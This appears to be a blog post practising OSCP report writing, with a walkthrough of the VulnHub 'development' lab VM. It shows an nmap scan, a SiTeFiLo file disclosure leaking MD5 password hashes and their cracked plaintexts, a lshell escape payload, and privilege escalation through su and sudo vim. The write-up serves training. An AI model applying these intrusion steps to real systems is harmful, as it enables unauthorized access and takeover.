OSCP report 练手之 - vulnhub development-improved

临近 OSCP Exam了,做点 Vulnhub 的靶机练练手,顺便也练练 Report 的编写。


靶机地址:

https://www.vulnhub.com/entry/digitalworldlocal-development,280/


stuck:

1、关键时候。。忘了查看网页源代码。关看提示的字去了,看了攻略才发现藏在网页源代码里。。。犯了低级错误。。

2、网页报错的时候,没有想到去搜索文件名。看了攻略才发现百度能搜到相关的 exploit


OSCP Exam Report 的模板在此:

https://www.offensive-security.com/pwk-online/PWK-Example-Report-v1.pdf


由于 Report 中只有第三节是重点,所以本节就直接仿照第三节来写了。

3.2 Report – Service Enumeration

Server IP Address Ports Open Service / Banner
192.168.92.164 22, 8080 ssh / Apache

3.3 Report – Penetration

Vulnerability Exploited: SiTeFiLo File Disclosure vulnerability

System Vulnerable: 192.168.92.164

Vulnerability Explanation: The Simple Text-File Login script (SiTeFiLo) suffers from a File Disclosure vulnerability . Leak a ssh account username and password.This vulnerability was used to obtain a low privilege shell.

Privilege Escalation Vulnerability: Credential leak and abuse sudo permission

Vulnerability Fix: Update SiTeFiLo to the lasted version

Severity: Critical


Information Gathering:


kali@kali:~/Desktop$ sudo nmap -sV 192.168.92.164 -p 1-65535 -n

……

PORT STATE SERVICE VERSION

22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)

113/tcp open ident?

139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)

445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)

8080/tcp open http-proxy IIS 6.0


Browse port 8080 web page.View the source code.Note these stuff:


Browse url http://192.168.92.164:8080/html_pages. “development” may be a hint


Browse url http://192.168.92.164:8080/development.html. View the source code.Find an intersting page


Browse url http://192.168.92.164:8080/developmentsecretpage/. Find a link


Browse url http://192.168.92.164:8080/developmentsecretpage/patrick.php. Find a link again


Browse url http://192.168.92.164:8080/developmentsecretpage/patrick.php?logout=1. Try to submit the form


After submit the form.Get an error


Searching the file name in Google.Get a sensitive data disclosure bug

Reference:

https://www.exploit-db.com/exploits/7444


Browse url http://192.168.92.164:8080/developmentsecretpage/slog_users.txt. Get four accounts’ username and password


Credentials here:

admin, 3cb1d13bb83ffff2defe8d1443d3a0eb

intern, 4a8a2b374f463b7aedbb44a066363b81

patrick, 87e6d56ce79af90dbe07d387d3d0579e

qiu, ee64497098d0926d198f54f6d5431f98


go to https://www.somd5.com/ website to crack above password md5 hash.

Plaintext username and password here:

patrick:P@ssw0rd25

intern:12345678900987654321

qiu:qiu


Try to use above username and password logging ssh. Only user “intern” logging successfully. But our shell is a limited shell named “lshell”


note that we can use command “echo”

escape payload:

echo && ‘bash’


Enum target information.

cat /etc/passwd


Note there a user “patrick”. We have this account’s password by SiTeFiLo “sensitive data disclosure bug” before.

Try to use command “su” to privilege lateral move to user “patrick” associated password “P@ssw0rd25”.


Eunmeration the sudo Permissions for user “patrick”


use vim to get root permission.



Proof: